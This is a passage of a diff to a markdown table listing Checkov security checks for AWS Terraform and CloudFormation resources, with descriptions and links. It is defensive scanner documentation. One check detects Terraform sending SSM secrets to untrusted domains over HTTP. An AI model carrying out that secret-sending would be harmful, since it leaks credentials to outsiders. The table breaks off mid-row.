+| 838 | CKV2_AWS_4 | resource | aws_api_gateway_stage | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) |
+| 839 | CKV2_AWS_5 | resource | aws_security_group | Ensure that Security Groups are attached to another resource | Terraform | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml) 
|
+| 840 | CKV2_AWS_6 | resource | aws_s3_bucket | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) |
+| 841 | CKV2_AWS_6 | resource | aws_s3_bucket_public_access_block | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) |
+| 842 | CKV2_AWS_7 | resource | aws_emr_cluster | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) |
+| 843 | CKV2_AWS_7 | resource | aws_security_group | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) |
+| 844 | CKV2_AWS_8 | resource | aws_rds_cluster | Ensure that RDS clusters has backup plan of AWS Backup | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml) |
+| 845 | CKV2_AWS_9 | resource | aws_backup_selection | Ensure that EBS are added in the backup plans of AWS Backup | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml) |
+| 846 | CKV2_AWS_10 | resource | aws_cloudtrail | Ensure CloudTrail trails are integrated with CloudWatch Logs | Terraform | 
[CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml) |
+| 847 | CKV2_AWS_11 | resource | aws_vpc | Ensure VPC flow logging is enabled in all VPCs | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml) |
+| 848 | CKV2_AWS_12 | resource | aws_default_security_group | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) |
+| 849 | CKV2_AWS_12 | resource | aws_vpc | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) |
+| 850 | CKV2_AWS_14 | resource | aws_iam_group | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) |
+| 851 | CKV2_AWS_14 | resource | aws_iam_group_membership | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) |
+| 852 | CKV2_AWS_15 | resource | aws_autoscaling_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. 
| Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) |
+| 853 | CKV2_AWS_15 | resource | aws_elb | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) |
+| 854 | CKV2_AWS_15 | resource | aws_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) |
+| 855 | CKV2_AWS_16 | resource | aws_appautoscaling_target | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) |
+| 856 | CKV2_AWS_16 | resource | aws_dynamodb_table | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) |
+| 857 | CKV2_AWS_18 | resource | aws_backup_selection | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml) |
+| 858 | CKV2_AWS_19 | resource | aws_eip | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | 
[EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) |
+| 859 | CKV2_AWS_19 | resource | aws_eip_association | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) |
+| 860 | CKV2_AWS_20 | resource | aws_alb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) |
+| 861 | CKV2_AWS_20 | resource | aws_alb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) |
+| 862 | CKV2_AWS_20 | resource | aws_lb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) |
+| 863 | CKV2_AWS_20 | resource | aws_lb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) |
+| 864 | CKV2_AWS_21 | resource | aws_iam_group_membership | Ensure that all IAM users are members of at least one IAM group. 
| Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml) |
+| 865 | CKV2_AWS_22 | resource | aws_iam_user | Ensure an IAM User does not have access to the console | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml) |
+| 866 | CKV2_AWS_23 | resource | aws_route53_record | Route53 A Record has Attached Resource | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml) |
+| 867 | CKV2_AWS_27 | resource | aws_rds_cluster | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) |
+| 868 | CKV2_AWS_27 | resource | aws_rds_cluster_parameter_group | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) |
+| 869 | CKV2_AWS_28 | resource | aws_alb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) |
+| 870 | CKV2_AWS_28 | resource | aws_lb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) |
+| 871 | CKV2_AWS_29 | resource | aws_api_gateway_rest_api | Ensure public API gateway are protected by WAF | Terraform | 
[APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) |
+| 872 | CKV2_AWS_29 | resource | aws_api_gateway_stage | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) |
+| 873 | CKV2_AWS_30 | resource | aws_db_instance | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) |
+| 874 | CKV2_AWS_30 | resource | aws_db_parameter_group | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) |
+| 875 | CKV2_AWS_31 | resource | aws_wafv2_web_acl | Ensure WAF2 has a Logging Configuration | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml) |
+| 876 | CKV2_AWS_32 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a response headers policy attached | Terraform | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml) |
+| 877 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) |
+| 878 | CKV2_AWS_33 | resource | aws_appsync_graphql_api | Ensure AppSync is protected by WAF | Terraform | 
[AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml) |
+| 879 | CKV2_AWS_34 | resource | aws_ssm_parameter | AWS SSM Parameter should be Encrypted | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml) |
+| 880 | CKV2_AWS_35 | resource | aws_route | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) |
+| 881 | CKV2_AWS_35 | resource | aws_route_table | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) |
+| 882 | CKV2_AWS_36 | resource | aws_ssm_parameter | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) |
+| 883 | CKV2_AWS_36 | resource | data.http | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) |
+| 884 | CKV2_AWS_37 | resource | aws | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 885 | CKV2_AWS_37 | resource | aws_accessanalyzer_analyzer | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 886 | CKV2_AWS_37 | resource | aws_acm_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 887 | CKV2_AWS_37 | resource | aws_acm_certificate_validation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 888 | CKV2_AWS_37 | resource | aws_acmpca_certificate_authority | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 889 | CKV2_AWS_37 | resource | aws_ami | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 890 | CKV2_AWS_37 | resource | aws_ami_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 891 | CKV2_AWS_37 | resource | aws_ami_from_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 892 | CKV2_AWS_37 | resource | aws_ami_launch_permission | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 893 | CKV2_AWS_37 | resource | aws_api_gateway_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 894 | CKV2_AWS_37 | resource | aws_api_gateway_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 895 | CKV2_AWS_37 | resource | aws_api_gateway_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 896 | CKV2_AWS_37 | resource | aws_api_gateway_base_path_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 897 | CKV2_AWS_37 | resource | aws_api_gateway_client_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 898 | CKV2_AWS_37 | resource | aws_api_gateway_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 899 | CKV2_AWS_37 | 
resource | aws_api_gateway_documentation_part | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 900 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 901 | CKV2_AWS_37 | resource | aws_api_gateway_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 902 | CKV2_AWS_37 | resource | aws_api_gateway_gateway_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 903 | CKV2_AWS_37 | resource | aws_api_gateway_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 904 | CKV2_AWS_37 | resource | aws_api_gateway_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 905 | CKV2_AWS_37 | resource | aws_api_gateway_method | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 906 | CKV2_AWS_37 | resource | aws_api_gateway_method_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 907 | CKV2_AWS_37 | resource | aws_api_gateway_method_settings | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 908 | CKV2_AWS_37 | resource | aws_api_gateway_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 909 | CKV2_AWS_37 | resource | aws_api_gateway_request_validator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 910 | CKV2_AWS_37 | resource | aws_api_gateway_resource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 911 | CKV2_AWS_37 | resource | aws_api_gateway_rest_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 912 | CKV2_AWS_37 | resource | aws_api_gateway_stage 
| Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 913 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 914 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 915 | CKV2_AWS_37 | resource | aws_api_gateway_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 916 | CKV2_AWS_37 | resource | aws_apigatewayv2_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 917 | CKV2_AWS_37 | resource | aws_apigatewayv2_api_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 918 | CKV2_AWS_37 | resource | aws_apigatewayv2_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 
919 | CKV2_AWS_37 | resource | aws_apigatewayv2_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 920 | CKV2_AWS_37 | resource | aws_apigatewayv2_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 921 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 922 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 923 | CKV2_AWS_37 | resource | aws_apigatewayv2_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 924 | CKV2_AWS_37 | resource | aws_apigatewayv2_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 925 | CKV2_AWS_37 | resource | aws_apigatewayv2_route_response | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 926 | CKV2_AWS_37 | resource | aws_apigatewayv2_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 927 | CKV2_AWS_37 | resource | aws_apigatewayv2_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 928 | CKV2_AWS_37 | resource | aws_app_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 929 | CKV2_AWS_37 | resource | aws_appautoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 930 | CKV2_AWS_37 | resource | aws_appautoscaling_scheduled_action | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 931 | CKV2_AWS_37 | resource | aws_appautoscaling_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 932 | CKV2_AWS_37 | resource | aws_appmesh_mesh | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 933 | CKV2_AWS_37 | resource | aws_appmesh_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 934 | CKV2_AWS_37 | resource | aws_appmesh_virtual_node | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 935 | CKV2_AWS_37 | resource | aws_appmesh_virtual_router | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 936 | CKV2_AWS_37 | resource | aws_appmesh_virtual_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 937 | CKV2_AWS_37 | resource | aws_appsync_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 938 | CKV2_AWS_37 | resource | aws_appsync_datasource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 939 | CKV2_AWS_37 | 
